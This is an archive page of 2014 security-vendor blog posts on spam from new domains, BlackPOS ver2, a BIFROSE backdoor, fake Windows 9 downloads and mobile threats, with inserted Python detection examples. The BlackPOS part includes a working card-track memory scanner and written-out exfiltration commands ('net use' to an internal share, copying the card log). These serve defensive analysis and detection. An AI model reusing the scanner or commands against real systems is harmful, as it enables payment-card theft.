Archive for August, 2014

We recently reported on a large spike of commercial spam that used micro-sized "salad words" or random gibberish in the email body to bypass spam filters. The content of these messages varied from hair loss cures to car sales to retailer coupons. Most of the samples contained links to the websites being advertised.

Aside from the tactic itself, this spam run is notable because its two primary sources are hosting service providers and newly registered domains that had not previously been associated with known or detected spam activity. Service providers are often treated as trustworthy, but it now seems that they are being openly abused by spammers.

New Spam Sources

The majority of the spam-sending IPs belonged to a company associated with a Canadian hosting service provider. The remaining IP addresses belong to US-based providers.

Newly registered domains were another noteworthy spam source. Spammers created these domains and wasted no time in using them both as the sender address and as the URL inside the mail body, as seen in the table below. They started spamming only minutes after registering the domains. When unsuspecting users clicked the links in the email message, they were redirected to spam websites.

Spammers may have favored new domains precisely because a domain with no spam history does not arouse suspicion. Analysis by our engineers shows that all the domains were registered through the same registrar by one organization.

Figure 1. Time between domain registration and first known spamming activity

Figure 2 shows the peak spam volume associated with this campaign within a 24-hour period. Closer inspection reveals that the spam run was composed of multiple short bursts of spamming activity, shown in Figure 3. Each burst came from one IP address, followed by another burst from a different IP address, and so on. Such behavior is most likely an attempt to evade IP-based filtering solutions.

Figure 2. Peak spam volume within specific hours

Figure 3. Multiple IPs contribute to the spam runs
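Both signals described above, domains that send mail minutes after registration and single-IP bursts that rotate through a provider's address space, can be checked on a mail gateway log. The following is an added example written for this page, not tooling from the original post; the log lines and the registration timestamps are constructed (in practice the latter come from a WHOIS/RDAP lookup), and the IPs are documentation addresses.

```python
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed mail-gateway log: (received_at, source_ip, sender_domain). Not real data;
# the IPs come from documentation ranges and the domains are invented.
MAIL_LOG = [
    ("2014-08-04 09:00:05", "203.0.113.10", "freshdeals-example.com"),
    ("2014-08-04 09:00:09", "203.0.113.10", "freshdeals-example.com"),
    ("2014-08-04 09:00:14", "203.0.113.10", "freshdeals-example.com"),
    ("2014-08-04 09:03:30", "203.0.113.11", "hairgrowth-example.net"),
    ("2014-08-04 09:03:41", "203.0.113.11", "hairgrowth-example.net"),
    ("2014-08-04 09:07:02", "203.0.113.12", "freshdeals-example.com"),
    ("2014-08-04 10:30:00", "198.51.100.7", "example.org"),
]

# Constructed registration times, standing in for what a WHOIS/RDAP lookup would return.
DOMAIN_CREATED = {
    "freshdeals-example.com": "2014-08-04 08:52:00",
    "hairgrowth-example.net": "2014-08-04 08:58:30",
    "example.org": "1995-08-31 00:00:00",
}


def parse(ts):
    return datetime.strptime(ts, FMT)


def young_domain_senders(log, created, max_age=timedelta(hours=24)):
    """Map sender domain -> minutes between registration and first sighting, for domains
    first seen within max_age of being registered. Domains with no WHOIS data are skipped."""
    first_seen = {}
    for ts, _ip, domain in log:
        t = parse(ts)
        if domain not in first_seen or t < first_seen[domain]:
            first_seen[domain] = t
    young = {}
    for domain, t in first_seen.items():
        if domain in created:
            age = t - parse(created[domain])
            if timedelta(0) <= age <= max_age:
                young[domain] = int(age.total_seconds() // 60)
    return young


def ip_bursts(log, gap=timedelta(minutes=2)):
    """Group messages into bursts: a burst continues while the source IP stays the same
    and consecutive messages are no more than `gap` apart. Returns [(ip, count, start, end)]."""
    bursts = []
    for ts, ip, _domain in sorted(log, key=lambda r: r[0]):
        t = parse(ts)
        if bursts and bursts[-1][0] == ip and t - bursts[-1][3] <= gap:
            _, count, start, _ = bursts[-1]
            bursts[-1] = (ip, count + 1, start, t)
        else:
            bursts.append((ip, 1, t, t))
    return bursts


def rotating_sources(bursts, min_bursts=3):
    """True when the run is several single-IP bursts that each come from a different IP:
    the pattern the post attributes to IP-filter evasion."""
    ips = [b[0] for b in bursts]
    return len(bursts) >= min_bursts and len(set(ips)) == len(ips)


def campaign_report(log, created):
    """Tie both signals together: restrict to mail from freshly registered domains,
    then look at how the sending IPs rotate within that subset."""
    young = young_domain_senders(log, created)
    campaign = [r for r in log if r[2] in young]
    bursts = ip_bursts(campaign)
    return {
        "young_domains": young,
        "bursts": [(ip, n) for ip, n, _s, _e in bursts],
        "rotating_ips": rotating_sources(bursts),
    }
```

Domain age alone produces false positives (legitimate businesses do register and mail on the same day), which is why the report combines it with the burst structure: a run that is both from hours-old domains and rotates through one IP after another is the pattern this campaign shows.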

Based on our IP statistics, 85% of the affected victims came from the US. Other top affected countries include Germany, Canada, Great Britain, and New Zealand.

Countermeasures

As spam techniques continue to adapt and evolve, users are advised to be on guard when opening their emails. Never open messages, download attachments, or click links from unknown senders. Security solutions, such as spam filtering, can help protect users from such threats.

We recently spotted a brand new BlackPOS (point-of-sale) malware, detected by Trend Micro as TSPY_MEMLOG.A. In 2012 the source code of BlackPOS was leaked, enabling other cybercriminals and attackers to enhance it. What is interesting about TSPY_MEMLOG.A is that it disguises itself as an installed service of a known AV vendor's software to avoid being noticed and deleted on infected PoS systems. This differs from previous PoS malware such as TSPY_POCARDL.U and TSPY_POCARDL.AB (BlackPOS), which hid behind the targeted company's own installed service.

The malware can be run with the options -[start|stop|install|uninstall]. The -install option installs the malware as a service named "<AV_Company> Framework Management Instrumentation", and the -uninstall option deletes that service. The RAM scraping routine starts as a thread when the installed service starts; the main routine only runs once the malware has successfully registered itself as a service.

Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes.

It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip.

The data is eventually written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack on the retailer Target in December 2013.

Figure 1. CreateToolhelp32Snapshot to enumerate processes

Based on our analysis, this PoS malware uses a new custom search routine to check RAM for track data. Such custom search routines have replaced the regex search seen in earlier PoS malware. It reads 0x20000 bytes (128 KB) in each pass and continues scanning until it has covered the entire memory region of the process being inspected.

Figure 2. Screenshot of reading process memory

Figure 3. Logging of data

It has an exclusion list of processes in which track data is not expected to be found. It gathers track data by scanning the memory of all running processes except the following:

smss.exe

csrss.exe

wininit.exe

services.exe

lsass.exe

svchost.exe

winlogon.exe

sched.exe

spoolsv.exe

System

conhost.exe

ctfmon.exe

wmiprvse.exe

mdm.exe

taskmgr.exe

explorer.exe

RegSrvc.exe

firefox.exe

chrome.exe

This skipping of scanning specific processes is similar to VSkimmer (detected as BKDR_HESETOX.CC).
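To make the scanning behaviour described above concrete (the 0x20000-byte passes, the non-regex search for track data, and the process exclusion list), here is an added example in the defender's shoes, not the malware's code: a Track 2 scanner a DLP or PoS-hardening team might use to test whether card data is exposed in a process's memory. It is written for this page, not taken from the original post. Assumptions: the Track 2 layout (`;PAN=YYMM...?`), the Luhn filter, and the 128-byte overlap are mine, the page does not describe the malware's exact matching logic; the `read` callback would wrap ReadProcessMemory via ctypes on a real Windows host, which is not shown; the sample "memory" is constructed and uses the standard Visa/Mastercard test card numbers.

```python
CHUNK = 0x20000     # bytes read per pass, the size reported for TSPY_MEMLOG.A
MAX_TRACK = 128     # generous upper bound on one Track 2 record; reused as the pass overlap

# Process names TSPY_MEMLOG.A skips, as listed on the page.
EXCLUDED = {n.lower() for n in (
    "smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "svchost.exe",
    "winlogon.exe", "sched.exe", "spoolsv.exe", "System", "conhost.exe", "ctfmon.exe",
    "wmiprvse.exe", "mdm.exe", "taskmgr.exe", "explorer.exe", "RegSrvc.exe",
    "firefox.exe", "chrome.exe")}


def should_scan(process_name):
    return process_name.lower() not in EXCLUDED


def luhn_ok(pan):
    """Standard Luhn check; a scraper uses it to drop strings that merely look like PANs."""
    total = 0
    for idx, ch in enumerate(reversed(pan)):
        d = ord(ch) - 48
        if idx % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_track2(buf):
    """Hand-rolled (no regex) scan for Track 2 records ';<PAN>=<YYMM><svc><data>?'.
    Returns [(offset, pan, yymm)] for records whose PAN passes Luhn."""
    hits = []
    n = len(buf)
    i = 0
    while i < n:
        if buf[i] != 0x3B:                      # ';' start sentinel
            i += 1
            continue
        j = i + 1
        while j < n and 0x30 <= buf[j] <= 0x39 and j - i - 1 < 19:
            j += 1                              # collect up to 19 PAN digits
        pan_len = j - i - 1
        if 13 <= pan_len <= 19 and j < n and buf[j] == 0x3D:   # '=' separator
            k = j + 1
            while k < n and 0x30 <= buf[k] <= 0x39:
                k += 1                          # expiry, service code, discretionary data
            if k < n and buf[k] == 0x3F and k - j - 1 >= 7 and k - i <= MAX_TRACK:  # '?' end
                pan = buf[i + 1:j].decode("ascii")
                if luhn_ok(pan):
                    hits.append((i, pan, buf[j + 1:j + 5].decode("ascii")))
                i = k + 1
                continue
        i += 1
    return hits


def scan_region(read, size):
    """Walk a `size`-byte region through read(offset, length) in CHUNK-byte passes, carrying
    MAX_TRACK bytes of overlap so a record straddling two passes is still found, once.
    On Windows `read` would wrap ReadProcessMemory via ctypes (assumed, not shown here)."""
    found = {}
    carry = b""
    offset = 0
    while offset < size:
        data = read(offset, min(CHUNK, size - offset))
        window = carry + data
        base = offset - len(carry)
        for rel, pan, yymm in find_track2(window):
            found[base + rel] = (pan, yymm)    # keyed by absolute offset, so overlap hits dedup
        carry = window[-MAX_TRACK:]
        offset += len(data)
    return sorted(found.items())


def build_sample_region():
    """Constructed 'process memory': one record straddling the first pass boundary, one
    after it, and a decoy that fails Luhn. PANs are the well-known Visa/Mastercard test numbers."""
    rec1 = b";4111111111111111=2512101123456789?"
    rec2 = b";5555555555554444=2701201?"
    decoy = b";4111111111111112=2512101?"
    region = bytearray(2 * CHUNK + 512)
    for pos, rec in ((CHUNK - 10, rec1), (CHUNK + 300, rec2), (1000, decoy)):
        region[pos:pos + len(rec)] = rec
    return bytes(region)
```

The overlap is the part worth noting: a scanner that reads fixed-size windows without carrying the tail of the previous one misses any record that crosses a window boundary, which is exactly the failure mode the test record at `CHUNK - 10` exercises.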

In TSPY_MEMLOG.A, the credit card track data grabbed from memory is saved to the file McTrayErrorLogging.dll and sent to a shared location within the same network. We have seen this routine in another BlackPOS/Kaptoxa variant, detected as TSPY_POCARDL.AB. The one difference is that TSPY_MEMLOG.A uses a batch file to move the gathered data to the network share, while TSPY_POCARDL.AB executes the net command via cmd.exe directly. It is highly possible that the receiving server is itself compromised, since the malware logs into the domain with a specific username.

Data Exfiltration Mechanism

The malware drops the component t.bat which is responsible for transferring the data from McTrayErrorLogging.dll to a specific location in the network, t:\temp\dotnet\NDP45-KB2737084-x86.exe. It uses the following command to transfer the gathered data:

Figure 4. Screenshot of command used to transfer data

The "net use" command maps another machine's drive onto the local system. Here it logs into the domain with a specific username and maps the D drive of 10.44.2.153 (the address shown above) to the local drive letter t:.

In one of the biggest data breaches we saw in 2013, the cybercriminals behind it first offloaded the gathered data to a compromised server, while a different piece of malware running on that server uploaded it to an FTP site. We surmise that this new BlackPOS malware uses the same exfiltration tactic.
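The two steps of that batch file, a drive mapping to a raw IP with credentials on the command line followed by a copy of the .dll-named log to a path that looks like a .NET update package, are visible in process creation telemetry. The following is an added example for this page, not the original post's tooling: a small detector over Sysmon-style command lines. The events are constructed; the IP 10.44.2.153, the drive letter t: and the destination path come from the page, while the `d$` share name, the account and the password are assumptions.

```python
import re

# Sysmon-style process-creation events, constructed for this example: (host, image, command line).
# The share name, account and password are assumptions; only the IP, drive letter and
# destination path are taken from the page.
EVENTS = [
    ("POS-07", r"C:\Windows\System32\cmd.exe", r"cmd /c t.bat"),
    ("POS-07", r"C:\Windows\System32\net.exe",
     r"net use t: \\10.44.2.153\d$ Pa55word /user:CORP\svc_backup"),
    ("POS-07", r"C:\Windows\System32\cmd.exe",
     r'copy "C:\Windows\System32\McTrayErrorLogging.dll" t:\temp\dotnet\NDP45-KB2737084-x86.exe'),
    ("POS-07", r"C:\Windows\System32\net.exe", r"net use t: /delete"),
    ("WKS-12", r"C:\Windows\System32\net.exe", r"net use p: \\fileserver.corp.local\public"),
]

NET_USE = re.compile(
    r"net(?:\.exe)?\s+use\s+(?P<drive>[a-z]:)\s+\\\\(?P<host>[^\\\s]+)\\(?P<share>\S+)(?P<rest>.*)",
    re.I)
COPY = re.compile(r"\b(?:copy|move|xcopy)\s+(?P<src>\"[^\"]+\"|\S+)\s+(?P<dst>\"[^\"]+\"|\S+)", re.I)
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def detect_exfil(events):
    """Flag the two steps of the t.bat pattern: a drive mapped to a raw IP with inline
    credentials, then a file copied onto that drive under a changed extension."""
    mapped = {}        # (host, drive letter) -> remote host
    findings = []
    for host, _image, cmd in events:
        m = NET_USE.search(cmd)
        if m:
            drive, target = m["drive"].lower(), m["host"]
            mapped[(host, drive)] = target
            reasons = []
            if IPV4.fullmatch(target):
                reasons.append("share addressed by raw IP")
            if "/user:" in m["rest"].lower():
                reasons.append("credentials passed on the command line")
            if m["share"].endswith("$"):
                reasons.append("administrative share")
            if reasons:
                findings.append((host, "net use", "; ".join(reasons), cmd))
            continue
        m = COPY.search(cmd)
        if m:
            src, dst = m["src"].strip('"'), m["dst"].strip('"')
            reasons = []
            if src.lower().endswith(".dll") and dst.lower().endswith(".exe"):
                reasons.append("extension changed .dll -> .exe")
            drive = dst[:2].lower()
            if (host, drive) in mapped:
                reasons.append(f"destination on drive mapped to {mapped[(host, drive)]}")
            if reasons:
                findings.append((host, "copy", "; ".join(reasons), cmd))
    return findings
```

The benign mapping from WKS-12 to a named file server with no inline credentials produces no finding, while the PoS host produces one for the mapping and one for the copy; correlating the two on the same host within a short window is what turns a noisy "net use" rule into a usable alert.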

Countermeasures

PoS malware can possibly arrive on the affected network via the following means:

Targeting specific servers as the point of entry, followed by lateral movement

Compromising network communication

Infecting machines before deployment

As such, we recommend that enterprises and large organizations implement a multi-layered security solution to protect their network against vulnerabilities in systems and applications, since these may be used to infiltrate the network. In addition, check whether a system component has been modified or replaced, as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine whether their network has already been compromised by this new BlackPOS malware. For more information on PoS malware, read our white paper, Point-of-Sale System Breaches: Threats to the Retail and Hospitality Industries.

During the course of our investigation, we spotted the following anti-American messages embedded in the binary:

Figure 5. Screenshot of the messages embedded in the binary


Note that these strings are not used anywhere in the code; we surmise that they may be a signature of the group developing this malware.

Update as of 2:27 PM, September 11, 2014

Even though BlackPOS ver2 has an entirely different code compared to the BlackPOS which compromised Target, it duplicates the data exfiltration technique used by the Target BlackPOS. It is an improved clone of the original, which is why we decided to call this BlackPOS ver2.

It is also being reported in the press that some security vendors called this malware as “FrameworkPOS.” This is a play of the service name <AV_Company> Framework Management Instrumentation with which the malware installs itself.

Posted in Malware | New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts

We recently investigated a targeted attack against a device manufacturer, and in our analysis we found that the malware deployed into the target network is a variant of a well-known backdoor, BIFROSE. BIFROSE has been around for many years, is widely available in the cybercriminal underground, and has been used for a variety of cybercriminal activities.

One past incident that used BIFROSE was the "Here you have" spam campaign of 2010. That attack targeted human resources (HR) personnel of government offices such as the African Union and NATO. The incident is quite comparable to what we now call targeted attacks or APTs, so it is unsurprising to see the backdoor used for one.

The BIFROSE variant used against the device manufacturer (detected as BKDR_BIFROSE.ZTBG-A, SHA-1 5e2844b20715d0806bfa28bd0ebcba6cbb637ea1) supports the following remote-control and information-stealing routines:

Download a file

Upload a file

Get file details (file size, last modified time)

Create a folder

Delete a folder

Open a file using ShellExecute

Execute a command line

Rename a file

Enumerate all windows and their process IDs

Close a window

Move a window to the foreground

Hide a window

Send keystrokes to a window

Send mouse events to a window

Terminate a process

Get display resolution

Upload contents of %Windows%\winieupdates\klog.dat

Capture screenshot or webcam image

Figure 1. BIFROSE administrator panel

Figure 2. BIFROSE taking a screenshot of an affected system

BIFROSE is mostly known for its keylogging routines, but it is capable of stealing far more than keystrokes. It can also send keystrokes and mouse events to windows, which means the attacker may be able to operate as the affected user without having to compromise their accounts. For example, the attacker can log into internal systems or even send messages to other users in the network. What makes this variant more elusive is its use of Tor to communicate with its C&C server.

Can This Be Traced?

Apart from detecting the malware itself through a security solution, IT administrators can check for the presence of a BIFROSE variant in the network. One of the easiest checks is for the file klog.dat (%Windows%\winieupdates\klog.dat in this variant), which is associated with the keylogging routine.

Lastly, having a solution that is equipped to detect possibly malicious activity will help IT admins be able to determine the existence of an attack. For example, since this variant uses Tor in communicating with its C&C server, being able to detect Tor activity within a network will help identify potential attacks within the network, among others.
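The two checks suggested above, the klog.dat artifact on disk and Tor traffic on the wire, combine naturally into a hunt. Here is an added example for this page, not tooling from the original post. The file inventory and flow records are constructed; the relay list stands in for the published Tor consensus (available from the directory authorities or Onionoo) and uses documentation addresses, not real relays; 9001 and 9030 are Tor's default ORPort and DirPort, but relays also listen on 443, so a port match alone is a weak signal and the relay list is the stronger one.

```python
import ipaddress

# Constructed relay list standing in for the published Tor consensus (directory
# authorities or Onionoo); documentation addresses, not real relays.
TOR_RELAYS = {"192.0.2.44", "198.51.100.9", "203.0.113.200"}
# Default ORPort/DirPort. Relays also run on 443, so a port hit alone is a weak signal.
TOR_PORTS = {9001, 9030}
KLOG_SUFFIX = r"\winieupdates\klog.dat"   # %Windows%\winieupdates\klog.dat from the page

# Constructed inputs: a file inventory (host, path) and flow records (host, dst_ip, dst_port, bytes).
FILE_INVENTORY = [
    ("HR-PC-03", r"C:\Windows\winieupdates\klog.dat"),
    ("HR-PC-03", r"C:\Windows\System32\notepad.exe"),
    ("ENG-PC-11", r"C:\Windows\Temp\setup.log"),
]
FLOWS = [
    ("HR-PC-03", "192.0.2.44", 443, 5120),
    ("HR-PC-03", "203.0.113.200", 9001, 880),
    ("ENG-PC-11", "198.51.100.50", 443, 20480),
    ("FIN-PC-02", "10.0.0.8", 9030, 64),
]


def hunt_klog(inventory):
    """Hosts carrying the keylogger output file."""
    return sorted({host for host, path in inventory if path.lower().endswith(KLOG_SUFFIX)})


def hunt_tor(flows, relays=TOR_RELAYS, ports=TOR_PORTS):
    """Flows to a listed relay, or to a default Tor port outside private address space."""
    hits = []
    for host, dst, dport, _nbytes in flows:
        reasons = []
        if dst in relays:
            reasons.append("destination is a listed Tor relay")
        if dport in ports and not ipaddress.ip_address(dst).is_private:
            reasons.append(f"default Tor port {dport}")
        if reasons:
            hits.append((host, dst, dport, "; ".join(reasons)))
    return hits


def correlate(inventory, flows):
    """Hosts that show both indicators: the strongest lead for this variant."""
    return sorted({h for h, *_ in hunt_tor(flows)} & set(hunt_klog(inventory)))
```

The private-address exclusion keeps an internal service that happens to use port 9030 from tripping the rule; the internal host FIN-PC-02 in the sample data is dropped for that reason.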

The file (VideoPerformanceSetup.exe) is adware detected as ADW_BRANTALL.GA. Upon further analysis, the 5.11 GB file turned out to download a reskinned Windows 7 SP1 64-bit build bundled with a handful of software utilities, rather than a "leaked" copy of Windows 9. The default language setting for the installation is Portuguese (Brazil).

More Threats Leveraging the Windows 9 Hype

We found two more threats capitalizing on the Windows 9 hype. The first is similar to the one above – another blog offering a free download of Windows 9 behind a file hosting service link. That’s where the similarity ends however, as the downloaded file is a completely different one – one detected as ADW_INSTALLREX.GA. When executed, this adware downloads files detected as ADW_WAJADH, ADW_SPROTECT, and ADW_MULTIPLUG respectively.

Figure 4. Blog page offering free Windows 9 download

We also found a YouTube video page with the download link provided in the video's description. Clicking the link downloads two files, one labeled Keygen.exe and the other Setup.exe. Both are detected by Trend Micro as ADW_OUTBROWSE.GA.

Figure 5. YouTube page offering free Windows 9 download

The download links in both abovementioned cases are verified to be grayware.

Other threats that we’ve spotted at the time of this writing involve blogs with similar content, but instead of grayware, their payloads mostly involve redirecting to phishing scams that go after the user’s mobile phone number.

This influx of threats taking advantage of Windows 9's rumored developer preview release date further proves what we have been saying all along: cybercriminals will always use whatever is currently popular to bait potential victims. We have seen this kind of activity come up again and again around similar events, so it is safe to assume that the number of threats using Windows 9 as a lure will continue to grow. The fact that this is not even the official release, only a preview, shows how intent cybercriminals are on cashing in on the hype. We may see even more after the retail code itself ships, with malware posing as "cracked" or "free" versions.

The first half of this year has been quite eventful for the mobile threat landscape. Sure, we had an idea the state of affairs from 2013 would continue on to this year, but we didn’t know just to what extent. From ballooning mobile malware/high risk app numbers to vulnerabilities upon vulnerabilities, let’s recap just what happened in the past six months and see if we can learn anything from them for the six months ahead.

So, what did happen in the first half of 2014? Well, to summarize:

2 million and counting: Only six months after reaching 1 million, the combined number of mobile malware and high-risk apps has doubled to 2 million. That is an average of roughly 170,000 new apps per month.

The first coin-mining mobile malware: ANDROIDOS_KAGECOIN, a malicious app that turned any infected mobile device into a Bitcoin/Dogecoin/Litecoin miner, was discovered in March.

The first mobile ransomware: ANDROIDOS_LOCKER, discovered in May, locked phones by covering the screen with a large UI window.

Deep Web: Cybercriminals also began to use Tor in their malicious apps to cover their trails.

A handful of major vulnerabilities were also discovered in this half of 2014, ranging from the Android custom permission vulnerability to Apple's "goto fail" SSL/TLS bug in iOS. Heartbleed, a flaw in OpenSSL's TLS implementation, also made the news; being platform-agnostic, it affected not just desktops but basically any device running a vulnerable OpenSSL build, whether connecting to HTTPS websites or serving them.

Hugely popular events were also exploited by cybercriminals through social engineering. The 2014 FIFA World Cup, for example, brought fake game apps bearing the event's name, each with its own malicious routines. Flappy Bird, the addictive game that captured the attention of the entire mobile gaming scene, also drew its share of malicious clones.

That’s the first half of 2014 in a nutshell, with the most noteworthy events encapsulated. Can we learn anything from them in time to prepare for the next six months? Yes, of course – one lesson we can easily derive here is that we can always expect cybercriminals to take advantage of legitimate services that help make our lives more convenient online – and sometimes, they use it in ways we’ll never expect them to. So we need to look at new services coming out and, after seeing if they CAN be used maliciously, prepare for that inevitability. It helps to be prepared, after all.

Another lesson for the second half of 2014 is that people need to take mobile threats much more seriously. It’s no longer just a passing fad or something we can just forget about – it’s here, it’s happening, and like social engineering it’s going to be a part of our lives until the next breakthrough in technology comes along. Users, business owners, professionals need to protect themselves from becoming a victim – and all it takes are some best practices and a security solution.

For more information regarding the mobile threat landscape and how it fared in the first half of 2014, we’d like to point readers towards the latest issue of our Monthly Mobile Report, titled The Mobile Landscape Roundup: 1H 2014. You’ll see the events summarized above, but in more detail, along with other news events and definitely a lot more stats.